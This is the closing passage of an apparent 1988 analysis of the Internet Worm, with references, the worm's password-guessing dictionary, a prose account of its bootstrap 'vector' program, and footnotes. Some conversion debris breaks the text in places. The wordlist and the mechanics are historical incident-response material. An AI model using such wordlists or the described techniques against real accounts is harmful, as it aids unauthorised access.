Ken Raeburn, Hal Birkeland and John T. Kohl. A disassembled 
version of the worm code was provided at Purdue by staff of the 
Purdue University Computing Center, Rich Kulawiec in particular. 
Thanks to the individuals who reviewed early drafts of this paper 
and contributed their advice and expertise: Don Becker, Kathy 
Heaphy, Brian Kantor, R. J. Martin, Richard DeMillo, and 
especially Keith Bostic and Steve Bellovin. My thanks to all 
these individuals. My thanks and apologies to anyone who should 
have been credited and was not. 

References 

Allm83. Allman, Eric, 
Sendmail\320An Internetwork Mail Router, 
University of California, Berkeley, 1983. Issued with the BSD 
UNIX documentation set. 
Brun75. Brunner, John, The Shockwave Rider, Harper & Row, 1975. 
Cohe84. Cohen, Fred, ``Computer Viruses: Theory and 
Experiments,'' PROCEEDINGS OF THE 7TH NATIONAL COMPUTER SECURITY 
CONFERENCE, pp. 240-263, 1984. 
Denn88. Denning, Peter J., ``Computer Viruses,'' AMERICAN 
SCIENTIST, vol. 76, pp. 236-238, May-June 1988. 
Dewd85. Dewdney, A. K., ``A Core War Bestiary of viruses, worms, 
and other threats to computer memories,'' SCIENTIFIC AMERICAN, 
vol. 252, no. 3, pp. 14-23, May 1985. 
Gerr72. Gerrold, David, When Harlie Was One, Ballentine Books, 
1972. The first edition. 
Gram84. Grampp, Fred. T. and Robert H. Morris, ``UNIX Operating 
System Security,'' 
AT&T BELL LABORATORIES TECHNICAL JOURNAL, vol. 63, no. 8, part 2, 
pp. 1649-1672, Oct. 1984. 
Harr77. Harrenstien, K., ``Name/Finger,'' RFC 742, SRI Network 
Information Center, December 1977. 
Morr79. Morris, Robert and Ken Thompson, ``UNIX Password 
Security,'' COMMUNICATIONS OF THE ACM, vol. 22, no. 11, pp. 594-
597, ACM, November 1979.
Post82. Postel, Jonathan B., ``Simple Mail Transfer Protocol,'' 
RFC 821, SRI Network Information Center, August 1982. 
Reid87. Reid, Brian, ``Reflections on Some Recent Widespread 
Computer Breakins,'' COMMUNICATIONS OF THE ACM, vol. 30, no. 2, 
pp. 103-105, ACM, February 1987. 
Ritc79.Ritchie, Dennis M., ``On the Security of UNIX, '' in U nt 
2 def IX nt 0 def

SUPPLEMENTARY DOCUMENTS, AT & T, 1979. Seel88. Seeley, Donn, ``A 
Tour of the Worm,'' TECHNICAL REPORT, Computer Science Dept., 
University of Utah, November 1988. Unpublished report. 
Shoc82. Shoch, John F. and Jon A. Hupp, ``The Worm Programs \320 
Early Experience with a Distributed Computation,'' COMMUNICATIONS 
OF THE ACM, vol. 25, no. 3, pp. 172-180, ACM, March 1982. 

            Appendix A The Dictionary 

What follows is the mini-dictionary of words contained in the 
worm. These were tried when attempting to break user passwords. 
Looking through this list is, in some sense revealing, but 
actually raises a significant question: how was this list chosen? 
The assumption has been expressed by many people that this list 
represents words commonly used as passwords; this seems unlikely. 
Common choices for passwords usually include fantasy characters, 
but this list contains none of the likely choices \(e.g., 
``hobbit,'' ``dwarf,'' ``gandalf,'' ``skywalker,'' ``conan''\). 
Names of relatives and friends are often used, and we see women's 
names like ``jessica,'' ``caroline,'' and ``edwina,'' but no 
instance of the common names ``jennifer'' or ``kathy.'' Further, 
there are almost no men's names such as ``thomas'' or either of 
``stephen'' or ``steven'' \(or ``eugene''!\). Additionally, none 
of these have the initial letters capitalized, although that is 
often how they are used in passwords. Also of interest, there are 
no obscene words in this dictionary, yet many reports of 
concerted password cracking experiments have revealed that there 
are a significant number of users who use such words \(or 
phrases\) as passwords. The list contains at least one incorrect 
spelling: ``commrades'' instead of ``comrades''; I also believe 
that ``markus'' is a misspelling of ``marcus.'' Some of the words 
do not appear in standard dictionaries and are non-English names: 
``jixian,'' ``vasant,'' ``puneet,'' etc. There are also some 
unusual words in this list that I would not expect to be 
considered common: ``anthropogenic,'' ``imbroglio,'' ``umesh,'' 
``rochester,'' ``fungible,'' ``cerulean,'' etc. I imagine that 
this list was derived from some data gathering with a limited set 
of passwords, probably in some known \(to the author\) computing 
environment. That is, some dictionary-based or brute-force attack 
was used to crack a selection of a few hundred passwords taken 
>From a small set of machines. Other approaches to gathering 
passwords could also have been used\320Ethernet monitors, Trojan 
Horse login programs, etc. However they may have been cracked, 
the ones that were broken would then have been added to this 
dictionary. Interestingly enough, many of these words are not in 
the standard on-line dictionary \(in /usr/dict/words\). As such, 
these words are useful as a supplement to the main dictionary-
based attack the worm used as strategy #4, but I would suspect 
them to be of limited use before that time. This unusual 
composition might be useful in the determination of the 
author\(s\) of this code. One approach would be to find a system 
with a user or local dictionary containing these words. Another 
would be to find some system\(s\) where a significant quantity of 
passwords could be broken with this list. aaa academia aerobics 
airplane albany albatross albert alex alexander algebra aliases 
alphabet ama amorphous analog anchor andromache animals answer 
anthropogenic anvils anything aria ariadne arrow arthur athena 
atmosphere aztecs azure bacchus bailey banana bananas bandit 
banks barber baritone bass bassoon batman beater beauty beethoven 
beloved benz beowulf berkeley berliner beryl beverly bicameral 
bob brenda brian bridget broadway bumbling burgess campanile 
cantor cardinal carmen carolina caroline cascades castle cat 
cayuga celtics cerulean change charles charming charon chester 
cigar classic clusters coffee coke collins commrades computer 
condo cookie cooper cornelius couscous creation creosote cretin 
daemon dancer daniel danny dave december defoe deluge desperate 
develop dieter digital discovery disney dog drought duncan eager 
easier edges edinburgh edwin edwina egghead eiderdown eileen 
einstein elephant elizabeth ellenemeraldengine engineer 
enterprise enzyme ersatz establish estate euclid evelyn extension 
fairway felicia fender fermat fidelity finite fishers flakes 
float flower flowers foolproof football foresight format forsythe 
fourier fred friend frighten fun fungible gabriel gardner 
garfield gauss george gertrude ginger glacier gnu golfer gorgeous 
gorges gosling gouge graham gryphon guestguitargumption guntis 
hacker hamlet handily happening harmony harold harvey hebrides 
heinlein hello help herbert hiawatha hibernia honey horse horus 
hutchins imbroglio imperial include ingres inna innocuous 
irishman isis japan jessica jester jixian johnny joseph joshua 
judith juggle julia kathleen kermit kernel kirkland knight ladle 
lambda lamination larkin larry lazaruslebesguelee leland leroy 
lewis light lisa louis lynne macintosh mack maggot magic malcolm 
mark markus marty marvin master maurice mellon merlin mets 
michael michelle mike minimum minsky moguls moose morley mozart 
nancy napoleon nepenthe ness network newton next noxious 
nutrition nyquist oceanography ocelot olivetti olivia oracle orca 
orwell osirisoutlawoxford pacific painless pakistan pam papers 
password patricia penguin peoria percolate persimmon persona pete 
peter philip phoenix pierre pizza plover plymouth polynomial 
pondering pork poster praise precious prelude prince princeton 
protect protozoa pumpkin puneet puppet rabbit rachmaninoff 
rainbow raindrop raleigh random rascal really rebecca remote rick 
ripple robotics rochesterrolexromano ronald rosebud rosemary 
roses ruben rules ruth sal saxon scamper scheme scott scotty 
secret sensor serenity sharks sharon sheffield sheldon shiva 
shivers shuttle signature simon simple singer single smile smiles 
smooch smother snatch snoopy soap socrates sossina sparrows spit 
spring springer squires strangle stratford stuttgart subway 
success summer supersuperstage support supported surfer suzanne 
swearer symmetry tangerine tape target tarragon taylor telephone 
temptation thailand tiger toggle tomato topography tortoise 
toyota trails trivial trombone tubas tuttle umesh unhappy unicorn 
unknown urchin utility vasant vertigo vicky village virginia 
warren water weenie whatnot whiting whitney will william 
williamsburg willie winston wisconsinwizardwombat woodwind 
wormwood yacov yang yellowstone yosemite zap zimmerman 

         Appendix B The Vector Program

The worm was brought over to each machine it infected via the 
actions of a small program I call the vector program. Other 
individuals have been referring to this as the grappling hook 
program. Some people have referred to it as the program, since 
that is the suffix used on each copy. The source for this program 
would be transferred to the victim machine using one of the 
methods discussed in the paper. It would then be compiled and 
invoked on the victim machine with three command line arguments: 
the canonical IP address of the infecting machine, the number of 
the TCP port to connect to on that machine to get copies of the 
main worm files, and a magic number that effectively acted as a 
one-time-challenge password. If the ``server'' worm on the remote 
host and port did not receive the same magic number back before 
starting the transfer, it would immedi- ately disconnect from the 
vector program. This can only have been to prevent some- one from 
attempting to ``capture'' the binary files by spoofing a worm 
``server.'' This code also goes to some effort to hide itself, 
both by zeroing out the argu- ment vector, and by immediately 
forking a copy of itself. If a failure occurred in transferring a 
file, the code deleted all files it had already transferred, then 
it exited. One other key item to note in this code is that the 
vector was designed to be able to transfer up to 20 files; it was 
used with only three. This can only make one wonder if a more 
extensive version of the worm was planned for a later date, and 
if that version might have carried with it other command files, 
password data, or possibly local virus or trojan horse programs. 

<<what follows is a pair of programs that I was unable to decode 
with any dependability>>

References:

BSD is an acronym for Berkeley Software Distribution. 
UNIX is a registered trademark of AT&T Laboratories. 
VAX is a trademark of Digital Equipment Corporation. 

The second edition of the book, just published, has been 
``updated'' to omit this subplot about  VIRUS.  
  %%Page: 4 5

5  
It is probably a coincidence that the Internet Worm was loosed on 
November 2, the eve of this ``birthday.''  
6  
Note that a widely used alternative to sendmail, MMDF, is also 
viewed as too complex and large by  many users. Further, it is 
not perceived to be as flexible as sendmail if it is necessary 
to establish special  addressing and handling rules when bridging 
heterogeneous networks.  
7  
Strictly speaking, the password is not encrypted. A block of zero 
bits is repeatedly encrypted using  the user password, and the 
results of this encryption is what is saved. See [Morr79] for 
more details.  
8  
Such a list would likely include all words in the dictionary, the 
reverse of all such words, and a large  collection of proper 
names.  
8  
rexec is a remote command execution service. It requires that a 
username/password combination be  supplied as part of the 
request.  
9  
This was compiled in as port number 23357, on host 127.0.0.1 \(loopback\).  
10  
Using TCP port 11357 on host 128.32.137.13.  
11  
Interestingly, although the program was coded to get the address 
of the host on the remote end of  point-to-point links, no use 
seems to have been made of that information.  
12 
As if some of them aren't suspicious enough! 
13 
This appears to be a bug. The probable assumption was that the 
routine hl would handle infection of local hosts, but hl calls 
this routine! Thus, local hosts were never infected via this 
route. 
14 
This is puzzling. The appropriate file to scan for equivalent 
hosts would have been the .rhosts file, not the .forward file. 
15 
Private communication from someone present at the meeting. 
16 
The thought of a Sequent Symmetry or Gould NP1 infected with 
multiple copies of the worm presents an awesome \(and awful\) 
thought. The effects noticed locally when the worm broke into a 
mostly unloaded VAX 8800 were spectacular. The effects on a 
machine with one or two orders of magnitude more capacity is a 
frightening thought. 
17 
Developed by Kevin Braunsdorf and Rich Kulawiec at Purdue PUCC. 
18 
Rick Adams, of the Center for Seismic Studies, has commented that 
we may someday hear that the worm was loosed to impress Jodie 
Foster. Without further information, this is as valid a 
speculation as any other, and should raise further disturbing 
questions; not everyone with access to computers is rational and 
sane, and future attacks may reflect this. 
19 
Throughout this paper I have been writing author\(s\) instead of 
author. It occurs to me that most of the mail, Usenet postings, 
and media coverage of this incident have assumed that it was 
author \(singular\). Are we so unaccustomed to working together 
on programs that this is our natural inclination? Or is it that 
we find it hard to believe that more than one individual could 
have such poor judgement? I also noted that most of people I 
spoke with seemed to assume that the worm author was male. I 
leave it to others to speculate on the value, if any, of these 
observations.